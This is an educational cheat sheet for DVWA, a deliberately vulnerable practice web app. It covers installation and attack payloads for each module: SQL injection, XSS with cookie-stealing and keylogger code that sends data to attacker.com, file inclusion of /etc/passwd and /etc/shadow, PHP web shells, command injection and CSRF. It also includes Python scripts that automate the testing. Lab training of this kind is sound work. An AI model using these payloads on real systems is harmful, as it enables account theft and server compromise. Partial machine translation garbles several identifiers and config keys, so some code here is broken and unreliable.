DVWA (Damn Vulnerable application web) aide-mémoire
Overview
Damn Vulnerable application web (DVWA) is a deliberately vulnerable application web designed for security professionals, students, and enthusiasts to practice application web security testing in a legal and controlled environment. Developed by Ryan Dewhurst and maintained by the DVWA team, this PHP/MySQL application web contains numerous intentional vulnerabilities that mirror real-world security flaws commonly found in application webs. DVWA serves as an educational platform that allows users to understand how application web vulnerabilities work, how they can be exploited, and most importantly, how they can be prevented.
The application is structured around the OWASP Top 10 vulnerabilities and includes additional security challenges that cover a broad spectrum of application web security issues. Each vulnérabilité in DVWA is implemented with multiple difficulty levels - Low, Medium, and High - allowing users to progressively develop their skills and understanding. The Low level typically has minimal or no security controls, Medium level implements some basic protections that can be bypassed, and High level includes more robust security measures that require advanced techniques to exploit.
DVWA's educational value extends beyond simple vulnérabilité exploitation. The application includes source code viewing capabilities, allowing users to examine the vulnerable code and understand the root causes of security issues. This feature is particularly valuable for developers who want to learn secure coding practices by seeing exemples of both vulnerable and secure implementations. The application also provides hints and guidance for each vulnérabilité, making it accessible to beginners while still challenging for experienced practitioners.
The platform supports various learning approaches, from individual self-study to classroom instruction and security training programs. Its modular design allows instructors to focus on specific vulnérabilité types or create comprehensive security assessment exercises. DVWA has become a standard tool in cybersecurity education, used by universities, training organizations, and security professionals worldwide to develop practical application web security skills.
Installation
Docker Installation (Recommended)
# Pull DVWA Docker image
docker pull vulnerables/web-dvwa
# Run DVWA container
docker run --rm -it -p 80:80 vulnerables/web-dvwa
# Run with persistent data
docker run -d -p 80:80 --name dvwa vulnerables/web-dvwa
# Access DVWA
# Navigate to http://localhôte in your browser
# Default identifiants: admin/mot de passe
# Stop container
docker stop dvwa
# Remove container
docker rm dvwa
# Run with custom port
docker run -d -p 8080:80 --name dvwa vulnerables/web-dvwa
Docker Compose Installation
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
dvwa:
image: vulnerables/web-dvwa
container_name: dvwa
ports:
- "80: 80"
environment:
- MYSQL_ROOT_mot de passe=dvwa
- MYSQL_DATABASE=dvwa
- MYSQL_USER=dvwa
- MYSQL_mot de passe=p@ssw0rd
volumes:
- dvwa_data: /var/lib/mysql
restart: unless-stopped
volumes:
dvwa_data:
EOF
# Start DVWA
docker-compose up -d
# View logs
docker-compose logs -f
# Stop DVWA
docker-compose down
# Stop and remove volumes
docker-compose down -v
Manual Installation on Ubuntu/Debian
# Update system
sudo apt update && sudo apt upgrade -y
# Install LAMP stack
sudo apt install apache2 mysql-server php php-mysql php-gd libapache2-mod-php -y
# Start services
sudo systemctl start apache2
sudo systemctl start mysql
sudo systemctl enable apache2
sudo systemctl enable mysql
# Secure MySQL Installation
sudo mysql_secure_Installation
# Create database and user
sudo mysql -u root -p ``<< 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhôte' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhôte';
FLUSH PRIVILEGES;
EXIT;
EOF
# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
# Set permissions
sudo chown -R www-data:www-data /var/www/html/dvwa
sudo chmod -R 755 /var/www/html/dvwa
# Configure DVWA
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php
# Edit configuration
sudo nano /var/www/html/dvwa/config/config.inc.php
# Update database settings:
# $_DVWA['db_user'] = 'dvwa';
# $_DVWA['db_mot de passe'] = 'p@ssw0rd';
# $_DVWA['db_database'] = 'dvwa';
# Configure PHP
sudo nano /etc/php/*/apache2/php.ini
# Set: allow_url_include = On
# Set: allow_url_fopen = On
# Restart Apache
sudo systemctl restart apache2
# Access DVWA at http://localhôte/dvwa
Installation on CentOS/RHEL
# Install EPEL repository
sudo yum install epel-release -y
# Install LAMP stack
sudo yum install httpd mariadb-server php php-mysql php-gd -y
# Start services
sudo systemctl start httpd
sudo systemctl start mariadb
sudo systemctl enable httpd
sudo systemctl enable mariadb
# Secure MariaDB
sudo mysql_secure_Installation
# Create database
sudo mysql -u root -p << 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhôte' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhôte';
FLUSH PRIVILEGES;
EXIT;
EOF
# Download and configure DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
sudo chown -R apache:apache /var/www/html/dvwa
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php
# Configure SELinux (if enabled)
sudo setsebool -P httpd_can_network_connect 1
sudo setsebool -P httpd_unified 1
# Configure firewall
sudo firewall-cmd --permanent --add-service=http
sudo firewall-cmd --reload
# Restart Apache
sudo systemctl restart httpd
Windows Installation (XAMPP)
# Download and install XAMPP
# https://www.apachefriends.org/download.html
# Start XAMPP Control Panel
# Start Apache and MySQL services
# Download DVWA
# Extract to C:\xampp\htdocs\dvwa
# Configure database
# Open phpMyAdmin (http://localhôte/phpmyadmin)
# Create database 'dvwa'
# Create user 'dvwa' with mot de passe 'p@ssw0rd'
# Configure DVWA
# Copy config.inc.php.dist to config.inc.php
# Edit database settings in config.inc.php
# Access DVWA at http://localhôte/dvwa
Initial Setup and configuration
First-Time Setup
# Access DVWA setup page
# Navigate to http://localhôte/dvwa/setup.php
# Check system requirements
# Ensure all requirements are met (green checkmarks)
# Create/Reset Database
# Click "Create / Reset Database" button
# Login to DVWA
# Navigate to http://localhôte/dvwa/login.php
# nom d'utilisateur: admin
# mot de passe: mot de passe
# Change default mot de passe (recommended)
# Go to DVWA Security ->`` Change mot de passe
Security Level configuration
# Set security level
# Navigate to DVWA Security
# Low Security Level
# - Minimal security controls
# - Basic vulnerabilities easily exploitable
# - Ideal for beginners
# Medium Security Level
# - Some security controls implemented
# - Requires intermediate techniques
# - Good for skill development
# High Security Level
# - Robust security measures
# - Advanced exploitation techniques required
# - Challenging for experienced users
# Impossible Security Level
# - Secure implementation
# - Shows how vulnerabilities should be fixed
# - Educational reference for developers
User Management
# Default users in DVWA:
# admin:mot de passe (Administrator)
# gordonb:abc123 (User)
# 1337:charley (User)
# pablo:letmein (User)
# smithy:mot de passe (User)
# Add new users (via database)
mysql -u dvwa -p dvwa << 'EOF'
INSERT INTO users (user_id, first_name, last_name, user, mot de passe, avatar, last_login, failed_login)
VALUES (6, 'Test', 'User', 'testuser', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'http://localhôte/dvwa/hackable/users/testuser.jpg', '0000-00-00 00:00:00', 0);
EOF
# mot de passe hash for 'mot de passe': 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
vulnérabilité Modules
injection SQL
# Low Security Level
# Basic injection SQL
' OR '1'='1
' OR 1=1 --
' OR 1=1 #
# Extract database information
' UNION SELECT null, version() #
' UNION SELECT null, database() #
' UNION SELECT null, user() #
# Extract table names
' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() #
# Extract column names
' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' #
# Extract user data
' UNION SELECT user, mot de passe FROM users #
# Medium Security Level
# Bypass basic filtering
1' OR '1'='1
1' OR 1=1 --
1' UNION SELECT null, version() --
# High Security Level
# Use advanced techniques
1' OR '1'='1' LIMIT 1 --
1' UNION SELECT null, CONCAT(user,':',mot de passe) FROM users LIMIT 1 --
injection SQL (Blind)
# Boolean-based blind injection SQL
# Low Security Level
1' AND 1=1 # (True condition)
1' AND 1=2 # (False condition)
# Extract database name length
1' AND LENGTH(database())=4 #
# Extract database name character by character
1' AND SUBSTRING(database(),1,1)='d' #
1' AND SUBSTRING(database(),2,1)='v' #
1' AND SUBSTRING(database(),3,1)='w' #
1' AND SUBSTRING(database(),4,1)='a' #
# Time-based blind injection SQL
1' AND SLEEP(5) #
1' AND IF(LENGTH(database())=4,SLEEP(5),0) #
# Extract user count
1' AND (SELECT COUNT(*) FROM users)=5 #
# Extract admin mot de passe length
1' AND LENGTH((SELECT mot de passe FROM users WHERE user='admin'))=32 #
cross-site scripting (XSS) (XSS)
# Reflected XSS
# Low Security Level
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Medium Security Level
# Bypass basic filtering
<Script>alert('XSS')</Script>
<SCRIPT>alert('XSS')</SCRIPT>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
# High Security Level
# Advanced bypass techniques
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg><script>alert('XSS')</script></svg>
# Cookie stealing charge utile
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
# clélogger charge utile
<script>
document.onclépress = function(e) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/log.php?clé=' + String.fromCharCode(e.which), true);
xhr.send();
\\\\}
</script>
cross-site scripting (XSS) (Stored)
# Stored XSS in message/comment fields
# Low Security Level
<script>alert('Stored XSS')</script>
<img src=x onerror=alert('Stored XSS')>
# Persistent cookie stealing
<script>
var img = new Image();
img.src = 'http://attacker.com/steal.php?cookie=' + document.cookie;
</script>
# Admin session hijacking
<script>
if(document.cookie.indexOf('admin') !== -1) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/admin.php?session=' + document.cookie, true);
xhr.send();
\\\\}
</script>
# BeEF hook
<script src="http://attacker.com:3000/hook.js"></script>
# Medium/High Security Level
# Use encoding and obfuscation
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">
Cross-Site Request Forgery (CSRF)
<form action="http://localhôte/dvwa/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="mot de passe_new" value="hacked123">
<input type="hidden" name="mot de passe_conf" value="hacked123">
<input type="hidden" name="Change" value="Change">
<input type="submit" value="Click me!">
</form>
<form id="csrf" action="http://localhôte/dvwa/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="mot de passe_new" value="hacked123">
<input type="hidden" name="mot de passe_conf" value="hacked123">
<input type="hidden" name="Change" value="Change">
</form>
<script>document.getElementById('csrf').submit();</script>
<img src="http://localhôte/dvwa/vulnerabilities/csrf/?mot de passe_new=hacked123&mot; de passe_conf=hacked123&Change;=Change">
<iframe src="data:text/html,<form action='http://localhôte/dvwa/vulnerabilities/csrf/' method='GET'><input name='mot de passe_new' value='hacked123'><input name='mot de passe_conf' value='hacked123'><input name='Change' value='Change'></form><script>document.forms[0].submit()</script>"></iframe>
File Inclusion
# Local File Inclusion (LFI)
# Low Security Level
page=../../../etc/passwd
page=../../../etc/shadow
page=../../../var/log/apache2/access.log
page=../../../proc/version
page=../../../home/user/.bash_history
# Windows LFI
page=../../../windows/system32/drivers/etc/hôtes
page=../../../windows/win.ini
page=../../../windows/system.ini
# PHP wrapper exploitation
page=php://filter/convert.base64-encode/resource=../../../etc/passwd
page=php://filter/read=string.rot13/resource=../../../etc/passwd
# Log poisoning
# First, poison the log file via User-Agent
# Then include the log file
page=../../../var/log/apache2/access.log
# Medium Security Level
# Bypass basic filtering
page=....//....//....//etc/passwd
page=..././..././..././etc/passwd
# High Security Level
# Use null byte injection (older PHP versions)
page=../../../etc/passwd%00
page=../../../etc/passwd%00.php
# Remote File Inclusion (RFI)
# If allow_url_include is enabled
page=http://attacker.com/shell.txt
page=ftp://attacker.com/shell.txt
File Upload
# Low Security Level
# Upload PHP shell directly
<?php system($_GET['cmd']); ?>
# Save as shell.php and upload
# Medium Security Level
# Bypass MIME type filtering
# Change Content-Type to image/jpeg
# Or use double extension: shell.php.jpg
# Bypass file extension filtering
shell.php
shell.php5
shell.phtml
shell.phar
# High Security Level
# Embed PHP in image
# Create valid image with embedded PHP
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Rename to image.php
# GIF header bypass
GIF89a
<?php system($_GET['cmd']); ?>
# PNG bypass with PHP
# Create PNG with PHP charge utile in metadata
injection de commandees
# Low Security Level
# Basic injection de commandees
127.0.0.1; ls
127.0.0.1 && whoami
127.0.0.1|cat /etc/passwd
127.0.0.1 & id
# Windows injection de commandees
127.0.0.1 & dir
127.0.0.1 && type C:\windows\win.ini
127.0.0.1|net user
# Medium Security Level
# Bypass basic filtering
127.0.0.1;ls
127.0.0.1&&whoami;
127.0.0.1|cat$\\\\{IFS\\\\}/etc/passwd
# High Security Level
# Advanced bypass techniques
127.0.0.1|cat</etc/passwd
127.0.0.1|cat<>/etc/passwd
127.0.0.1|\\\\{cat,/etc/passwd\\\\}
Weak session IDs
# Analyze session ID patterns
# Low Security Level
# session IDs increment sequentially
# Predict next session ID
# Medium Security Level
# session IDs based on timestamp
# Calculate based on time
# High Security Level
# session IDs use MD5 of timestamp
# Still predictable with time knowledge
# session hijacking techniques
# Capture session cookies
# Use browser developer tools
# Intercept with Burp Suite
# session fixation attacks
Insecure CAPTCHA
# Low Security Level
# CAPTCHA validation bypass
# Remove step paramètre
# Modify passed paramètre
# Medium Security Level
# Bypass CAPTCHA validation
# Reuse passed paramètre
# Manipulate form data
# High Security Level
# Advanced CAPTCHA bypass
# Analyze CAPTCHA generation
# exploit implementation flaws
# Automated bypass techniques
# Use OCR tools
# Machine learning approaches
# Pattern recognition
Testing Methodologies
Manual Testing Approach
# 1. reconnaissance
# - Examine source code
# - Identify input fields
# - Analyze client-side validation
# - Check for hidden paramètres
# 2. Input Validation Testing
# - Test all input fields
# - Try various charge utiles
# - Check for filtering mechanisms
# - Test boundary conditions
# 3. authentification Testing
# - Test login mechanisms
# - Check session management
# - Test mot de passe policies
# - Verify logout functionality
# 4. autorisation Testing
# - Test Contrôle d'Accèss
# - Check escalade de privilèges
# - Verify user roles
# - Test direct object références
# 5. session Management Testing
# - Analyze session jetons
# - Test session fixation
# - Check session timeout
# - Verify secure drapeaus
Automated Testing Tools
# SQLmap for injection SQL
sqlmap -u "http://localhôte/dvwa/vulnerabilities/sqli/?id=1&Submit;=Submit" --cookie="PHPSESSID=your_session_id; security=low" --dbs
# Nikto web scanner
nikto -h http://localhôte/dvwa/
# OWASP ZAP
# Configure proxy settings
# Spider the application
# Run active scan
# Burp Suite
# Configure browser proxy
# Intercept requests
# Use scanner and intruder
# w3af application web scanner
w3af_console
cible http://localhôte/dvwa/
plugins
audit sql_injection,xss,csrf
crawl web_spider
start
Custom Testing Scripts
#!/usr/bin/env python3
# DVWA injection SQL tester
import requests
import sys
def test_sql_injection(base_url, session_cookie):
charge utiles = [
"' OR '1'='1",
"' OR 1=1 --",
"' OR 1=1 #",
"' UNION SELECT null, version() #",
"' UNION SELECT user, mot de passe FROM users #"
]
headers = \\\\{
'Cookie': f'PHPSESSID=\\\\{session_cookie\\\\}; security=low'
\\\\}
for charge utile in charge utiles:
url = f"\\\\{base_url\\\\}/vulnerabilities/sqli/?id=\\\\{charge utile\\\\}&Submit;=Submit"
try:
response = requests.get(url, headers=headers)
if 'admin' in response.text or 'root' in response.text:
print(f"[+] Successful charge utile: \\\\{charge utile\\\\}")
print(f"[+] Response contains sensitive data")
else:
print(f"[-] Failed charge utile: \\\\{charge utile\\\\}")
except Exception as e:
print(f"[!] Error with charge utile \\\\{charge utile\\\\}: \\\\{e\\\\}")
if __name__ == "__main__":
if len(sys.argv) != 3:
print("utilisation: python3 dvwa_sqli_test.py <base_url> <session_cookie>")
sys.exit(1)
base_url = sys.argv[1]
session_cookie = sys.argv[2]
test_sql_injection(base_url, session_cookie)
Educational Exercises
Beginner Exercises
# Exercise 1: Basic injection SQL
# Objective: Extract all nom d'utilisateurs and mot de passes
# Steps:
# 1. Set security level to Low
# 2. Navigate to injection SQL module
# 3. Try basic charge utiles
# 4. Extract database information
# 5. Dump user identifiants
# Exercise 2: Reflected XSS
# Objective: Execute JavaScript in victim's browser
# Steps:
# 1. Find XSS vulnerable paramètre
# 2. Craft XSS charge utile
# 3. Test different bypass techniques
# 4. Create cookie stealing charge utile
# Exercise 3: File Upload Bypass
# Objective: Upload and execute PHP shell
# Steps:
# 1. Create PHP shell
# 2. Try direct upload
# 3. Bypass file type restrictions
# 4. Execute commandes through shell
Intermediate Exercises
# Exercise 4: Blind injection SQL
# Objective: Extract data without direct output
# Steps:
# 1. Identify blind injection point
# 2. Use boolean-based techniques
# 3. Extract database name
# 4. Extract user mot de passes
# 5. Automate extraction processus
# Exercise 5: CSRF Attack Chain
# Objective: Change admin mot de passe via CSRF
# Steps:
# 1. Analyze mot de passe change functionality
# 2. Create CSRF proof of concept
# 3. Test different delivery methods
# 4. Bypass CSRF protections
# Exercise 6: LFI to RCE
# Objective: Achieve code execution via LFI
# Steps:
# 1. Find LFI vulnérabilité
# 2. Test file inclusion
# 3. Poison log files
# 4. Achieve remote code execution
Advanced Exercises
# Exercise 7: Multi-Stage Attack
# Objective: Combine multiple vulnerabilities
# Steps:
# 1. Use XSS to steal admin session
# 2. Use CSRF to change admin mot de passe
# 3. Login as admin
# 4. Upload shell via file upload
# 5. Achieve system access
# Exercise 8: session Prediction
# Objective: Predict and hijack sessions
# Steps:
# 1. Analyze session ID generation
# 2. Identify patterns
# 3. Predict valid session IDs
# 4. Hijack user sessions
# Exercise 9: Complete Compromise
# Objective: Full application takeover
# Steps:
# 1. Enumerate all vulnerabilities
# 2. Chain exploits together
# 3. Escalate privileges
# 4. Maintain persistance
# 5. Document attack path
Integration with Security Tools
Burp Suite Integration
# Configure Burp Suite proxy
# Browser settings: 127.0.0.1:8080
# Burp Suite testing workflow
# 1. Spider DVWA application
# 2. Review site map
# 3. Send requests to Repeater
# 4. Test with Intruder
# 5. Run active scanner
# Custom Burp extensions for DVWA
# - DVWA Security Level Changer
# - Automated charge utile generator
# - Custom session handling
OWASP ZAP Integration
# ZAP automated scan
zap-baseline.py -t http://localhôte/dvwa/
# ZAP full scan
zap-full-scan.py -t http://localhôte/dvwa/
# ZAP API utilisation
# Start ZAP démon
zap.sh -démon -port 8080
# Spider application
curl "http://localhôte:8080/JSON/spider/action/scan/?url=http://localhôte/dvwa/"
# Active scan
curl "http://localhôte:8080/JSON/ascan/action/scan/?url=http://localhôte/dvwa/"
# Generate report
curl "http://localhôte:8080/OTHER/core/other/htmlreport/" > dvwa_report.html
Custom Security Scanner
#!/usr/bin/env python3
# DVWA comprehensive scanner
import requests
import re
import time
from urllib.parse import urljoin
class DVWAScanner:
def __init__(self, base_url, session_cookie):
self.base_url = base_url
self.session = requests.session()
self.session.cookies.set('PHPSESSID', session_cookie)
self.session.cookies.set('security', 'low')
def test_sql_injection(self):
print("[*] Testing injection SQL...")
url = urljoin(self.base_url, '/vulnerabilities/sqli/')
charge utiles = [
"' OR '1'='1",
"' UNION SELECT user, mot de passe FROM users #"
]
for charge utile in charge utiles:
params = \\\\{'id': charge utile, 'Submit': 'Submit'\\\\}
response = self.session.get(url, params=params)
if 'admin' in response.text:
print(f"[+] injection SQL successful: \\\\{charge utile\\\\}")
return True
print("[-] injection SQL not found")
return False
def test_xss(self):
print("[*] Testing XSS...")
url = urljoin(self.base_url, '/vulnerabilities/xss_r/')
charge utiles = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>"
]
for charge utile in charge utiles:
params = \\\\{'name': charge utile\\\\}
response = self.session.get(url, params=params)
if charge utile in response.text:
print(f"[+] XSS successful: \\\\{charge utile\\\\}")
return True
print("[-] XSS not found")
return False
def test_file_inclusion(self):
print("[*] Testing File Inclusion...")
url = urljoin(self.base_url, '/vulnerabilities/fi/')
charge utiles = [
"../../../etc/passwd",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
for charge utile in charge utiles:
params = \\\\{'page': charge utile\\\\}
response = self.session.get(url, params=params)
if 'root:' in response.text or 'cm9vdDo' in response.text:
print(f"[+] File Inclusion successful: \\\\{charge utile\\\\}")
return True
print("[-] File Inclusion not found")
return False
def run_scan(self):
print(f"[*] Starting DVWA scan on \\\\{self.base_url\\\\}")
results = \\\\{
'sql_injection': self.test_sql_injection(),
'xss': self.test_xss(),
'file_inclusion': self.test_file_inclusion()
\\\\}
print("\n[*] Scan Results:")
for vuln, found in results.items():
status = "VULNERABLE" if found else "NOT FOUND"
print(f" \\\\{vuln\\\\}: \\\\{status\\\\}")
return results
if __name__ == "__main__":
scanner = DVWAScanner("http://localhôte/dvwa", "your_session_id")
scanner.run_scan()
Best Practices for Learning
Progressive Learning Path
# Phase 1: Understanding Basics (Low Security)
# - Learn how vulnerabilities work
# - Practice basic exploitation
# - Understand attack vectors
# - Review source code
# Phase 2: Bypass Techniques (Medium Security)
# - Learn common protections
# - Practice bypass methods
# - Understand filtering mechanisms
# - Develop advanced charge utiles
# Phase 3: Advanced exploitation (High Security)
# - Master complex techniques
# - Chain multiple vulnerabilities
# - Develop custom exploits
# - Understand defense mechanisms
# Phase 4: Secure Development (Impossible Security)
# - Study secure implementations
# - Learn defensive coding
# - Understand security controls
# - Apply lessons to real applications
documentation and Reporting
# Create learning journal
mkdir ~/dvwa_learning
cd ~/dvwa_learning
# Document each vulnérabilité
cat << 'EOF' > sql_injection_notes.md
# injection SQL Learning Notes
## Low Security Level
- vulnérabilité: Direct injection SQL in id paramètre
- charge utile: ' OR '1'='1
- Result: Bypassed authentification
- Root Cause: No input validation
## Medium Security Level
- Protection: Basic filtering of quotes
- Bypass: Using numeric injection
- charge utile: 1 OR 1=1
- Lesson: Client-side filtering insufficient
## High Security Level
- Protection: Prepared statements
- Result: Injection prevented
- Lesson: Proper paramètreization prevents SQLi
EOF
# Create exploit database
cat << 'EOF' > exploits.txt
# DVWA exploit Database
## injection SQL
' OR '1'='1
' UNION SELECT user, mot de passe FROM users #
## XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
## File Inclusion
../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../etc/passwd
EOF
Safe Testing Environment
# Isolated network setup
# Use VirtualBox/VMware
# Create isolated network segment
# No internet access for vulnerable systems
# Backup and restore
# Create VM snapshots before testing
# Document system state
# Reset between exercises
# Monitoring and logging
# Enable web server logs
# Monitor system activity
# Document all actions
# Review logs for learning
⚠️ Security Notice: DVWA (Damn Vulnerable application web) is intentionally vulnerable and should only be used in isolated, controlled environments for educational purposes. Never deploy DVWA on production networks or systems accessible from the internet. The application contains serious security vulnerabilities that could compromise system security if exposed. Always use DVWA in virtual machines or isolated lab environments. This tool is designed for learning application web security and should be used responsibly by security professionals, students, and researchers.
📚 Additional Resources: - DVWA Official GitHub Repository - DVWA documentation - OWASP Top 10 - application web Security Testing Guide